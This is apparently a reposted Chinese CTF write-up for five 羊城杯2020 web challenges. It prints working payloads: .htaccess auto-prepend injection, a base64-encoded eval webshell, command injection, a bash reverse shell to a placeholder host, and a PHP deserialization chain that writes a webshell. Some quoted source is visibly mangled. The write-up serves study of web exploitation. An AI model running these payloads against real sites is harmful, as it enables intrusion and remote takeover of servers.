Snakin_ya
Snakin_ya

[NSSCTF][羊城杯2020]WEB复现

easycon

考点:一句话,base64转图片

访问index.php,提示eval post cmd,应该是有一句话,直接蚁剑连接

[NSSCTF][羊城杯2020]WEB复现_第1张图片

里面有一个bbbbbbbbb.txt,打开发现是一串base64编码

[NSSCTF][羊城杯2020]WEB复现_第2张图片

发现是jpg头,base64转图片即可

[NSSCTF][羊城杯2020]WEB复现_第3张图片

easyphp

考点:.htaccess

 
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nHello, world");
?>

代码审计,content不能有on|html|type|flag|upload|file关键字,filename只能有字母和点,且每次访问都会删除当前目录除index.php之外的文件。

我们先尝试写一个一句话进去

?filename=a.php&content=/**//*

然而发现并没有解析,猜测配置文件中关闭了php解析(该题应该是只设置index.php解析)

[NSSCTF][羊城杯2020]WEB复现_第4张图片

开发者既可以在主配置文件中更改 php_flag值,也可以在分布式配置文件(.htaccess)中更改此值
.htaccess优先度高于主配置文件

.htaccess可以更改 auto_append_file 这个属性,这个属性是指php文件自动包含的文件,可以自己包含自己来获取webshell

法一:

?filename=.htaccess&content=php_value%20auto_prepend_fi\%0ale%20".htaccess"%0a%23%20\

这里%23也就是#的作用是注释,避免服务端报错

法二

?content=php_value%20pcre.backtrack_limit%200%0aphp_value%20pcre.jit%200%0a%23\&f ilename=.htaccess

这里通过设置正则回溯次数来绕过正则匹配,之后就可以用伪协议写入木马

?filename=php://filter/write=convert.base64- decode/resource=.htaccess&content=cGhwX3ZhbHVlIHBjcmUuYmFja3RyYWNrX2xpbWl0IDAKcG hwX3ZhbHVlIHBjcmUuaml0IDAKcGhwX3ZhbHVlIGF1dG9fYXBwZW5kX2ZpbGUgLmh0YWNjZXNzCiM8P3 BocCBldmFsKCRfR0VUWzFdKTs/Plw&1=phpinfo();

easyphp2

考点:伪协议

url最后是/?file=GWHT.php,猜测是文件包含

访问robots.txt,提示check.php

那我们尝试用伪协议读取,有过滤,编码绕过

?file=php://filter/convert.%6%32ase64-encode/resource=GWHT.php

读到源码:

GWHT.PHP





    
    
    
    count is here

    





 


    '.''.'
'.'
'.'
'.'404'.'
'.'
'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
    }
    ?>

    
A Counter is here, but it has someting wrong


    

        
        

        
    


    The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "";
    }
    ?>

check.php


$pass = "GWHT";
// Cookie password.
echo "Here is nothing, isn't it ?";

header('Location: /');

看代码先写个马:

?file=GWHT.php&count='|echo "" > a.php'

蚁剑连接

/GWHT/README中找到一个md之后的password,解密得到

GWHTCTF

找一找flag位置:

find / -name "flag*"

[NSSCTF][羊城杯2020]WEB复现_第5张图片

找到了:

/GWHT/system/of/a/down/flag.txt

直接读取没有权限,我们查看一下ls -la

发现需要root权限或者GWHT用户,执行命令

printf "GWHTCTF" | su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'

Blackcat

F12查看源码,点进MP3,在最底部发现源码

if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('Ë­£¡¾¹¸Ò²ÈÎÒÒ»Ö»¶úµÄβ°Í£¡');
}

$clandestine = getenv("clandestine");

if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);


$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if($hh !== $_POST['Black-Cat-Sheriff']){
    die('ÓÐÒâÃé×¼£¬ÎÞÒâ»÷·¢£¬ÄãµÄÃÎÏë¾ÍÊÇÄãÒªÃé×¼µÄÄ¿±ê¡£ÏàÐÅ×Ô¼º£¬Äã¾ÍÊÇÄÇ¿ÅÉäÖаÐÐĵÄ×Óµ¯¡£');
}

echo exec("nc".$_POST['One-ear']);

hash_hmac()函数第二个参数为数组的时候,返回结果为NULL。


$cmd0=";bash -c 'bash -i >%26 /dev/tcp/vps/ip/8888 0>%261'";
$cmd = ";bash -c 'bash -i >& /dev/tcp/vps/ip/8888 0>&1'";
$hmac = hash_hmac('sha256', $cmd, false);
echo "White-cat-monitor[]=a&One-ear=".$cmd0."&Black-Cat-Sheriff=".$hmac;

反弹shell即可

easyser

考点:SSRF,绕过死亡exit

查看robots.txt文件提示star1.php

进入查看源码,提示小胖说用个不安全的协议从我家才能进ser.php呢

使用:

http://127.0.0.1/ser.php

得到源码:


error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} 
$flag='{Trump_:"fake_news!"}';

class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;
        
    }
    public function hasaki(){
        $d   = ' die("nononon");?>';
        $a= $d. $this->text;
         @file_put_contents($this-> file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}

?>

构造POC:


class GWHT{
    public $hero;
}

class Yongen{ //flag.php

    public $file = "php://filter/convert.base64-decode/resource=aaa.php";
    public $text = "aaaPD9waHAgZXZhbCgkX1BPU1Rbc10pOyAgPz4=";
}

$a = new GWHT;
$a->hero = new Yongen;
echo urlencode(serialize($a));

你可能感兴趣的:(刷题记录,前端,php,安全)

  • 我那女企业家的雄心 _培兒
    甜蜜+1要努力啊,要好好挣钱。这是我母亲从小就教育我的。财富是要通过努力才能得到的。在二十来岁的时候,一腔热血,勇敢,去过很多城市,怀揣着梦想。只要能挣钱不违法,苦点累点都能承受,我明白家庭背景给不了的,靠自己创造。也许现在的创业青年也是这样想的吧。努力总有回报这是真理,对于钱也挣了些。那些年,我发现自己,在情感里,我是非常脆弱的。在外漂泊多年,越发害怕离别!家是最能给人安全感的港湾!然后找了个韩
  • Linux-------基础 Pluto & Ethereal linux运维服务器
    目录一、基础1、Linux的特点:2、UbuntuLinux的特点:3、用户切换的命令4、常用命令一、基础1、Linux的特点:开放性、安全性、多用户性、网络性2、UbuntuLinux的特点:1、拥有完整图形化界面,是面向普通用户对象,比较容易上手2、安装UbuntuLinux会自带unity桌面环境,操作方便3、用户切换的命令su用户名切换到对应的用户sudo-i切换到root(超级管理员)4
  • 2023-04-23 锐行者
    什么是赎楼、赎楼贷、赎楼类型?首先我们要知道赎楼的概念?赎楼就是卖方为了出售未还清按揭的房屋,提前还清尾款把房产证从银行赎出来后才能出售赎的过程。那么什么是赎楼贷呢?赎楼贷一般是二手房交易中会碰到的环节,赎楼贷是卖方赎回房产证后出售给购买者,购买者通过贷款付清房款的一种方法。第一课就来讲一讲:具体赎楼有哪些类型?哪种赎楼贷更安全呢?闪电金服下面我们来介绍有哪些赎楼类型呢?赎楼是一门大学问,赎楼又分
  • 感恩日记~曼陀罗解读 慧宁Sandy
    解读了一个曼陀罗,记录下来宝贝,很高兴为你解读曼陀罗有灵性的宝宝,自尊心强喜欢有品位有质感的东西,爱美爱浪漫,喜欢追求稳定和平的关系,外在给人友善宽容有耐心,善于倾听朋友都很喜欢和你聊天,很有创意和智慧,只要你想要做都会做好,但内在有自我攻击和评判,对于未来有很多恐惧,安全感不足患得患失,外求希望得到他人的肯定与支持,外在让自己看上去很强大把自己变成带刺的刺猬,其实内在是善良的小女孩只是因为害怕受
  • 五分钟了解等级保护、风险评估和安全测评三者的区别和联系? 亿林等保 安全网络安全
    等级保护基本概念:网络安全等级保护是指对国家秘密信息、法人和其他组织和公民的专有信息以及公开信息和存储、传输、处理这些信息的信息系统分等级实行安全保护,对信息系统中使用的安全产品实行按等级管理,对信息系统中发生的信息安全事件等等级响应、处置。这里所指的信息系统,是指由计算机及其相关和配套的设备、设施构成的,按照一定的应用目标和规则对信息进行存储、传输、处理的系统或者网络;信息是指在信息系统中存储、
  • python eval函数的使用方法 丑的看不了 python编程语言1024程序员节
    一、eval函数的使用方法eval()函数是许多编程语言都内置的一个函数,如JS、PHP、Python等,用于返回括号内包含的表达式执行后的结果python中的使用格式为eval(表达式[(可选{字典形式})全局变量,[(可选)局部变量]])在Python中的基本用法:输入一组描述四则运算的字符串"125+255"需要重点关注的问题:输入eval(“125+255”)是否报错能否返回结果值检查返回
  • 刘思语115期亲子时间管理践行406天 君超sy
    闫君超➕多鼓励、多陪伴、少批评2020.11.17406/100011月关注:【阅读】训练目标:每天累计阅读一小时1、家长:(1)每天阅读或听书✅(2)对女儿说话温柔✅(3)坚持晚上11:00前睡觉✅2、孩子:(1)完成早睡✅(2)坚持跳绳或其他运动✅(3)坚持英语国学朗读✅健康习惯:1、家长6:00-11:00✅2、孩子6:30-9:30✅自主阅读:《安全知识漫画》《玛蒂达尔》《特种兵学校》今日
  • 前端Axios搭配Vue(认清Axios,Axios结合Vue发出Ajax请求,返回JSON数据案例!简洁易懂。) 酸奶代码 前端vue.jsjavascriptjsonajax
    一.什么是Axios1.axios是独立于vue的一个项目,不是Vue的一部分2.axios通常和Vue一起使用,实现Ajax操作3.Axios是一个基于promise的HTTP库axios官方文档二.引入Axios库文件1.可以直接引用2.可以下载Axios的js文件导入下载此js文件三.使用Axios配合Vue发出Ajax请求案例在Vue中使用Axios,向服务器发送Ajax请求,将获取的js
  • Springboot 项目中引入WebSocket后,单元测试出现错误,前端开发揭秘 杭州湾Java仔 2024年前端程序员springbootwebsocket单元测试
    java.lang.IllegalStateException:FailedtoloadApplicationContextatorg.springframework.test.context.cache.DefaultCacheAwareContextLoaderDelegate.loadContext(DefaultCacheAwareContextLoaderDelegate.java:12
  • 一分钟了解小程序的等保测评 亿林科技网络安全 小程序
    小程序作为移动互联网应用的一种形式,其安全性和合规性受到了国家法律法规的严格要求。根据《中华人民共和国网络安全法》和《信息安全技术个人信息安全规范》等相关法律法规,小程序在开发和运营过程中需要进行等级保护测评(等保测评),以确保用户数据的安全和隐私保护。等保测评是指对信息系统进行安全等级保护的评估,包括安全技术措施和安全管理措施的评估。小程序的等保测评得分需要在70分以上,且信息系统没有高风险项才
  • 云WAF防御简介之0day攻击 亿林科技网络安全 安全网络web安全
    0day攻击简介0day攻击,也称为零日攻击,是指利用软件或系统中未被公开或未被修复的安全漏洞进行的攻击。这种攻击通常由黑客在发现漏洞后立即利用,而软件开发商可能还没有来得及发布相应的补丁来修复这些漏洞。0day攻击的特点0day攻击的特点包括其隐蔽性和危害性。由于漏洞尚未被发现或修补,攻击者可以轻易地利用这些漏洞获取敏感信息、破坏系统、篡改数据等,给目标系统带来严重的损失。防范0day攻击的建议
  • 云WAF:网络安全的未来之选 亿林科技网络安全 web安全安全
    在数字化时代,网络安全面临着前所未有的挑战。云WAF(WebApplicationFirewall)作为一种创新的网络安全解决方案,正以其独特的优势引领网络安全的新潮流。云WAF(WebApplicationFirewall)作为保护Web应用安全的关键技术,正逐渐成为网络安全领域的新趋势。以下是几个主要原因:弹性扩展能力:云WAF基于云平台的资源和计算能力,可以实现动态的扩展和调整,根据实际流量
  • 网站安全监测:守护网络空间的坚实防线 德迅云安全-小潘 安全网络运维
    随着互联网技术的飞速发展和广泛应用,网站已成为企业、机构和个人展示形象、提供服务、传递信息的重要平台。然而,与此同时,网站也面临着日益严重的安全威胁。黑客攻击、数据泄露、恶意软件等安全问题频发,给网站运营者带来了巨大的经济损失和声誉风险。因此,网站安全监测成为了守护网络空间的重要防线。网站安全监测是指对网站进行全面的安全检查和评估,旨在发现潜在的安全隐患并及时采取相应措施进行防范和处置。它不仅是保
  • 2018-11-16 韩静_340c
    什么是沙游?在沙子中进行的富有想象力的活动。个体化进程的天然镜子。达到内在感觉和核心通路。无意识内容的直观呈现。安全和接纳性的环境。在一个被界定的空间内进行。用和不用水。用和不用物件。静态和动态的世界。辅助性治疗方法。治疗对象包括儿童,成人,夫妻,家庭,团体。沙游治疗的优势。其实沙盘游戏是非常有意思的。沙游融入了语言和非语言方法,通常用来做为心理治疗到辅导技术。沙游的发展趋势是尽可能摆脱僵化的规则
  • 揭秘IP地址与SSL证书:构建数字世界的信任桥梁 alsknv tcp/ipssl网络协议网络http
    在数字时代,每一次点击、每一次交易都离不开安全可靠的加密通信。当您访问一个网站时,是否曾好奇过,如何从浩瀚的网络海洋中确保信息准确无误地送达,并且免受窥探和篡改?答案就藏在IP地址与SSL证书这对黄金搭档中。IP地址:网络的身份证IP地址,即互联网协议地址,是每台联网设备在网络上的唯一身份标识。它就像您的家庭地址,让信息能够准确无误地找到目标。然而,仅凭IP地址并不足以保障通信的安全,因为它只负责
  • 海外云手机是否适合运营TikTok? TIANGEKUAJING 云手机海外云手机TikTok运营TikTok运营工具
    随着科技的迅猛发展,海外云手机逐渐成为改变工作模式的重要工具。这种基于云端技术的虚拟手机,不仅提供了更加便捷、安全的使用体验,还在电商引流和海外社媒管理等领域展示了其巨大潜力。那么,海外云手机究竟能否有效用于运营TikTok呢?海外云手机有什么特点?数据安全性云手机的一个显著优势在于其数据安全性能。通过将信息存储在云端,即便设备遗失或损坏,用户数据依然可以得到有效保护。这种存储方式确保了资料的安全
  • 【网络安全】URL解析器混淆绕过CSP实现XSS 秋说 网络安全web安全xss漏洞挖掘
    未经许可,不得转载。文章目录前言正文前言许多流行的静态网站生成器都存在图像CDN功能,它们通过优化网站中的图像来加快页面加载速度。例如:1、OptimizingImages|Next.js利用内置的next/image组件优化图像(nextjs.org)2、NuxtImage:Nuxt应用的图像优化即插即用的图像优化功能,使用内置优化器对图像进行调整(image.nuxt.com)这些工具的目标都
  • 一场说走就走的旅行 刺猬菇娘
    还有十天假期,原本计划好好休息休整迎接上班,可是当每个上班的人告诉我,好羡慕我还有10天假期,他们想去旅行都没时间。突然想,还有很多地方想去没去,犹豫得太多,比如金钱,住宿,一个人安全问题,还有以前那种一个人出行的勇气和胆量会随着年龄增长而变小。我是那种想法很多,缺乏行动力的人,好多事情好多人因为我的畏缩,我的犹豫而错过。他们说,想太多是很多都市人的通病。想太多,没行动;想太多,错过机会;想太多,
  • IP查询技术:构建网络安全的坚实防线 IP地址查询 web安全tcp/ip网络
    在数字化时代,企业网络面临着复杂多变的威胁与挑战。因此,构建一个稳固的网络安全体系至关重要。而IP查询技术,作为网络安全防御体系中的一把利剑,正日益成为企业防范网络风险的重要工具。什么是IP查询技术?IP查询技术,简而言之,是通过分析特定IP地址的活动和行为,来评估其潜在的网络威胁和安全风险。这一技术不仅关注IP地址的所在位置、历史活动记录,还深入剖析其连接模式、使用频率等关键信息。通过这些数据的
  • 丹凤张杰‖人生【感悟】词四首 丹凤张杰
    丹凤张杰‖人生【感悟】词四首三月春风拂面过阳光普照生万物花草树木生新样大好河山换容光日落夕阳半边天半辈己过无少年人生只有几万天何必苦恼度余年一辈儿孙一辈福努力进步自奋斗间隔运行有步骤命运在手自己走不早奋斗白了头咋能不叫人害羞少壮勤奋老来运一生不做无用人作者简介:张杰,笔名,丹江浪子,微信名,安全文明,商洛,丹凤人。中共党员,退役军人,初小文化,职业,通村客运乘务员。商洛棣花古镇乡土文化研究院会员,
  • Java 上传读取Excel文件 Ben_1043556915 Java进阶javaservlet开发语言
    Web中導入Excel文件ExtJs前端代碼://=========上傳Excel=============================uploadPanel=newExt.form.FormPanel({fileUpload:true,id:'fileUploadForm',frame:true,labelAlign:'right',buttonAlign:'center',labelWid
  • .NetCore+vue3上传图片 Multipart body length limit 16384 exceeded. 鱼是一只鱼啊 Vue后端.netcore图片上传vue3el-upload
    实现目标。点击图片上传头像效果图前端部分图片上传关键代码更换头像上传js部分import{ref,reactive,onMounted}from"vue";import{uploadAvatar}from"../../api/auth";import{ElMessage}from"element-plus";exportdefault{setup(){constfit=ref("cover");c
  • DL参考资源(二) antkillerfarm 深度学习
    DL参考资源推荐系统https://zhuanlan.zhihu.com/p/26237106深度学习在推荐算法上的应用进展http://i.dataguru.cn/mportal.php?mod=view&aid=11463深度学习在推荐领域的应用https://mp.weixin.qq.com/s/hGvQvddD3i858XSK4z08Ug主要推荐系统算法总结及Youtube深度学习推荐算法
  • 【0224读书清单】情商是什么?之九 李不乖
    001接受帮助并不丢脸向他人求助,其实既能解决自己的问题,也能开拓人际关系。面对真诚的请求,大多数人都不会拒绝,所以不要有太多顾忌。002柔能克刚女性可以坚强果断,但是不宜太过刚强,失去了女性的柔美。有时候,柔和比强硬更能解决问题。003保持距离和城府深的人,尤其是工于心计的人交往,要小心提防,谨言慎行,也不要自视聪明,借口对方的内心。还是保持安全距离的好。004把握界限和性格孤僻的人交往,要照顾
  • 反序列化漏洞 Slash_HK web安全相关php安全web安全
    JavaPHP反序列化总结文章目录一.PHP反序列化1.序列化serialize()2.反序列化unserialize()二.反序列化漏洞1.漏洞利用Magicfunction2.漏洞利用思路三._construct()的利用2.利用普通成员类方法四.PHP反序列化漏洞总结1.CVE-2016-7124一.PHP反序列化1.序列化serialize()首先我们创建了一个对象,通过serialize
  • 华山一日游旅游攻略 卖小伙子的姑凉
    华山以险、奇位居五岳之一。自古华山一条路,顾名思义,不管你是上山还是下山都是一条路。图片发自App我和朋友刚从华山回来,以自己的亲身经历这下这边华山攻略,希望能给各位想去华山玩的朋友们提供一点参考意见。华山可以24小时登山,旺季门票价格是160元,学生证半票80元,有效期为一天。根据自己的情况可以选择夜爬或者白天登山。我和我朋友因为都是妹子,考虑到体力和安全方面的问题,选择的是白天登山。登山的路线
  • Springboot配置文件中账号密码等敏感信息的加解密 乌托邦的逃亡者 软件开发springspringbootjava后端
    说明:使用过SpringBoot配置文件的朋友都知道,资源文件中的内容通常情况下是明文显示,安全性比较低。打开application.properties或application.yml,比如MySQL登录密码,Redis登录密码以及第三方的密钥等等一览无余。这里介绍一个加解密组件jasypt,用以提高配置文件中敏感配置数据的安全性。本文以数据库连接URL、用户名和数据库密码加密为例。一,引入Ma
  • 人生低谷时七个建议 袁开培
    1、找人聊一聊低谷期的时候很容易陷入自己的消极思维中,这时候找人聊聊有助于缓解自己的情绪,他人的建议还可能给你带来一些新的视角。你可以找那些你喜欢的并让你感觉安全的朋友或者家人,在他们面前你会感到轻松。也可以多换几个人聊一聊,他们或许能带来一些不同的感悟。2、不要停止自己手头的工作在低谷期保持工作状态确实有些困难,但如果可以,尽量不要停止自己手头的工作,哪怕做些很简单的内容。因为低谷期会有严重的“
  • MySQL 高可用性架构:复制与分片 墨瑾轩 数据库mysql架构adb
    关注墨瑾轩,带你探索编程的奥秘!超萌技术攻略,轻松晋级编程高手技术宝库已备好,就等你来挖掘订阅墨瑾轩,智趣学习不孤单即刻启航,编程之旅更有趣嗨,小伙伴们!今天我们要聊的是一个超级重要的话题——如何通过复制和分片技术来构建MySQL的高可用性架构。想象一下,你的数据库就像是一座城堡,里面藏满了宝贵的用户数据。为了保护这座城堡,我们需要建立一整套防御体系,确保数据安全无虞,而且即便遇到突发状况也能迅速
  • 2018-01-24 京心达张秀宝
    1.-23日日精进:敬畏—进入—体验—交给—持续1,缺啥补啥,怕啥练啥;2,一切为我所用,所用为团队家;3,我想变,我要变,我不得不变,我会变得越来越好。今日体验:年底了,回家的车辆增多,好好检查每一辆车,安全第一,让客户安全回家。核心:把客户车辆检查好,咱们心里也踏实。
  • Java序列化进阶篇 g21121 java序列化
            1.transient         类一旦实现了Serializable 接口即被声明为可序列化,然而某些情况下并不是所有的属性都需要序列化,想要人为的去阻止这些属性被序列化,就需要用到transient 关键字。
  • escape()、encodeURI()、encodeURIComponent()区别详解 aigo JavaScriptWeb
    原文:http://blog.sina.com.cn/s/blog_4586764e0101khi0.html   JavaScript中有三个可以对字符串编码的函数,分别是: escape,encodeURI,encodeURIComponent,相应3个解码函数:,decodeURI,decodeURIComponent 。 下面简单介绍一下它们的区别 1 escape()函
  • ArcgisEngine实现对地图的放大、缩小和平移 Cb123456 添加矢量数据对地图的放大、缩小和平移Engine
    ArcgisEngine实现对地图的放大、缩小和平移:  个人觉得是平移,不过网上的都是漫游,通俗的说就是把一个地图对象从一边拉到另一边而已。就看人说话吧.  具体实现: 一、引入命名空间    using ESRI.ArcGIS.Geometry;    using ESRI.ArcGIS.Controls; 二、代码实现.
  • Java集合框架概述 天子之骄 Java集合框架概述
       集合框架 集合框架可以理解为一个容器,该容器主要指映射(map)、集合(set)、数组(array)和列表(list)等抽象数据结构。 从本质上来说,Java集合框架的主要组成是用来操作对象的接口。不同接口描述不同的数据类型。   简单介绍:   Collection接口是最基本的接口,它定义了List和Set,List又定义了LinkLi
  • 旗正4.0页面跳转传值问题 何必如此 javajsp
    跳转和成功提示 a)        成功字段非空forward 成功字段非空forward,不会弹出成功字段,为jsp转发,页面能超链接传值,传输变量时需要拼接。接拼接方式list.jsp?test="+strweightUnit+"或list.jsp?test="+weightUnit+&qu
  • 全网唯一:移动互联网服务器端开发课程 cocos2d-x小菜 web开发移动开发移动端开发移动互联程序员
        移动互联网时代来了!     App市场爆发式增长为Web开发程序员带来新一轮机遇,近两年新增创业者,几乎全部选择了移动互联网项目!传统互联网企业中超过98%的门户网站已经或者正在从单一的网站入口转向PC、手机、Pad、智能电视等多端全平台兼容体系。据统计,AppStore中超过85%的App项目都选择了PHP作为后端程
  • Log4J通用配置|注意问题 笔记 7454103 DAOapachetomcatlog4jWeb
    关于日志的等级 那些去 百度就知道了! 这几天 要搭个新框架  配置了 日志 记下来 !做个备忘! #这里定义能显示到的最低级别,若定义到INFO级别,则看不到DEBUG级别的信息了~! log4j.rootLogger=INFO,allLog # DAO层 log记录到dao.log 控制台 和 总日志文件 log4j.logger.DAO=INFO,dao,C
  • SQLServer TCP/IP 连接失败问题 ---SQL Server Configuration Manager darkranger sqlcwindowsSQL ServerXP
    当你安装完之后,连接数据库的时候可能会发现你的TCP/IP 没有启动.. 发现需要启动客户端协议 : TCP/IP  需要打开 SQL Server Configuration Manager... 却发现无法打开 SQL Server Configuration Manager..?? 解决方法:  C:\WINDOWS\system32目录搜索framedyn.
  • [置顶] 做有中国特色的程序员 aijuans 程序员
    从出版业说起 网络作品排到靠前的,都不会太难看,一般人不爱看某部作品也是因为不喜欢这个类型,而此人也不会全不喜欢这些网络作品。究其原因,是因为网络作品都是让人先白看的,看的好了才出了头。而纸质作品就不一定了,排行榜靠前的,有好作品,也有垃圾。 许多大牛都是写了博客,后来出了书。这些书也都不次,可能有人让为不好,是因为技术书不像小说,小说在读故事,技术书是在学知识或温习知识,有些技术书读得可
  • document.domain 跨域问题 avords document
    document.domain用来得到当前网页的域名。比如在地址栏里输入:javascript:alert(document.domain); //www.315ta.com我们也可以给document.domain属性赋值,不过是有限制的,你只能赋成当前的域名或者基础域名。比如:javascript:alert(document.domain = "315ta.com");
  • 关于管理软件的一些思考 houxinyou 管理
    工作好多看年了,一直在做管理软件,不知道是我最开始做的时候产生了一些惯性的思维,还是现在接触的管理软件水平有所下降.换过好多年公司,越来越感觉现在的管理软件做的越来越乱. 在我看来,管理软件不论是以前的结构化编程,还是现在的面向对象编程,不管是CS模式,还是BS模式.模块的划分是很重要的.当然,模块的划分有很多种方式.我只是以我自己的划分方式来说一下. 做为管理软件,就像现在讲究MVC这
  • NoSQL数据库之Redis数据库管理(String类型和hash类型) bijian1013 redis数据库NoSQL
    一.Redis的数据类型 1.String类型及操作         String是最简单的类型,一个key对应一个value,string类型是二进制安全的。Redis的string可以包含任何数据,比如jpg图片或者序列化的对象。         Set方法:设置key对应的值为string类型的value
  • Tomcat 一些技巧 征客丶 javatomcatdos
    以下操作都是在windows 环境下 一、Tomcat 启动时配置 JAVA_HOME 在 tomcat 安装目录,bin 文件夹下的 catalina.bat 或 setclasspath.bat 中添加 set JAVA_HOME=JAVA 安装目录 set JRE_HOME=JAVA 安装目录/jre 即可; 二、查看Tomcat 版本 在 tomcat 安装目
  • 【Spark七十二】Spark的日志配置 bit1129 spark
    在测试Spark Streaming时,大量的日志显示到控制台,影响了Spark Streaming程序代码的输出结果的查看(代码中通过println将输出打印到控制台上),可以通过修改Spark的日志配置的方式,不让Spark Streaming把它的日志显示在console   在Spark的conf目录下,把log4j.properties.template修改为log4j.p
  • Haskell版冒泡排序 bookjovi 冒泡排序haskell
    面试的时候问的比较多的算法题要么是binary search,要么是冒泡排序,真的不想用写C写冒泡排序了,贴上个Haskell版的,思维简单,代码简单,下次谁要是再要我用C写冒泡排序,直接上个haskell版的,让他自己去理解吧。     sort [] = [] sort [x] = [x] sort (x:x1:xs) | x>x1 = x1:so
  • java 路径 配置文件读取 bro_feng java
    这几天做一个项目,关于路径做如下笔记,有需要供参考。 取工程内的文件,一般都要用相对路径,这个自然不用多说。 在src统计目录建配置文件目录res,在res中放入配置文件。 读取文件使用方式: 1. MyTest.class.getResourceAsStream("/res/xx.properties") 2. properties.load(MyTest.
  • 读《研磨设计模式》-代码笔记-简单工厂模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * 个人理解:简单工厂模式就是IOC; * 客户端要用到某一对象,本来是由客户创建的,现在改成由工厂创建,客户直接取就好了 */ interface IProduct {
  • SVN与JIRA的关联 chenyu19891124 SVN
    SVN与JIRA的关联一直都没能装成功,今天凝聚心思花了一天时间整合好了。下面是自己整理的步骤: 一、搭建好SVN环境,尤其是要把SVN的服务注册成系统服务 二、装好JIRA,自己用是jira-4.3.4破解版 三、下载SVN与JIRA的插件并解压,然后拷贝插件包下lib包里的三个jar,放到Atlassian\JIRA 4.3.4\atlassian-jira\WEB-INF\lib下,再
  • JWFDv0.96 最新设计思路 comsci 数据结构算法工作企业应用公告
                       随着工作流技术的发展,工作流产品的应用范围也不断的在扩展,开始进入了像金融行业(我已经看到国有四大商业银行的工作流产品招标公告了),实时生产控制和其它比较重要的工程领域,而
  • vi 保存复制内容格式粘贴 daizj vi粘贴复制保存原格式不变形
        vi是linux中非常好用的文本编辑工具,功能强大无比,但对于复制带有缩进格式的内容时,粘贴的时候内容错位很严重,不会按照复制时的格式排版,vi能不能在粘贴时,按复制进的格式进行粘贴呢? 答案是肯定的,vi有一个很强大的命令可以实现此功能 。     在命令模式输入:set paste,则进入paste模式,这样再进行粘贴时
  • shell脚本运行时报错误:/bin/bash^M: bad interpreter 的解决办法 dongwei_6688 shell脚本
    出现原因:windows上写的脚本,直接拷贝到linux系统上运行由于格式不兼容导致 解决办法: 1. 比如文件名为myshell.sh,vim myshell.sh 2. 执行vim中的命令 : set ff?查看文件格式,如果显示fileformat=dos,证明文件格式有问题 3. 执行vim中的命令 :set fileformat=unix 将文件格式改过来就可以了,然后:w
  • 高一上学期难记忆单词 dcj3sjt126com wordenglish
    honest 诚实的;正直的 argue 争论 classical 古典的 hammer 锤子 share  分享;共有 sorrow 悲哀;悲痛 adventure 冒险 error 错误;差错 closet 壁橱;储藏室 pronounce 发音;宣告 repeat 重做;重复 majority 大多数;大半   native 本国的,本地的,本国
  • hibernate查询返回DTO对象,DTO封装了多个pojo对象的属性 frankco POJOhibernate查询DTO
          DTO-数据传输对象;pojo-最纯粹的java对象与数据库中的表一一对应。       简单讲:DTO起到业务数据的传递作用,pojo则与持久层数据库打交道。         有时候我们需要查询返回DTO对象,因为DTO
  • Partition List hcx2013 partition
    Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x. You should preserve the original relative order of th
  • Spring MVC测试框架详解——客户端测试 jinnianshilongnian
    上一篇《Spring MVC测试框架详解——服务端测试》已经介绍了服务端测试,接下来再看看如果测试Rest客户端,对于客户端测试以前经常使用的方法是启动一个内嵌的jetty/tomcat容器,然后发送真实的请求到相应的控制器;这种方式的缺点就是速度慢;自Spring 3.2开始提供了对RestTemplate的模拟服务器测试方式,也就是说使用RestTemplate测试时无须启动服务器,而是模拟一
  • 关于推荐个人观点 liyonghui160com 推荐系统关于推荐个人观点
        回想起来,我也做推荐了3年多了,最近公司做了调整招聘了很多算法工程师,以为需要多么高大上的算法才能搭建起来的,从实践中走过来,我只想说【不是这样的】     第一次接触推荐系统是在四年前入职的时候,那时候,机器学习和大数据都是没有的概念,什么大数据处理开源软件根本不存在,我们用多台计算机web程序记录用户行为,用.net的w
  • 不间断旋转的动画 pangyulei 动画
    CABasicAnimation* rotationAnimation; rotationAnimation = [CABasicAnimation animationWithKeyPath:@"transform.rotation.z"]; rotationAnimation.toValue = [NSNumber numberWithFloat: M
  • 自定义annotation sha1064616837 javaenumannotationreflect
    对象有的属性在页面上可编辑,有的属性在页面只可读,以前都是我们在页面上写死的,时间一久有时候会混乱,此处通过自定义annotation在类属性中定义。越来越发现Java的Annotation真心很强大,可以帮我们省去很多代码,让代码看上去简洁。 下面这个例子 主要用到了 1.自定义annotation:@interface,以及几个配合着自定义注解使用的几个注解 2.简单的反射 3.枚举
  • Spring 源码 up2pu spring
    1.Spring源代码 https://github.com/SpringSource/spring-framework/branches/3.2.x 注:兼容svn检出 2.运行脚本 import-into-eclipse.bat 注:需要设置JAVA_HOME为jdk 1.7 build.gradle compileJava { sourceCompatibilit
  • 利用word分词来计算文本相似度 yangshangchuan wordword分词文本相似度余弦相似度简单共有词
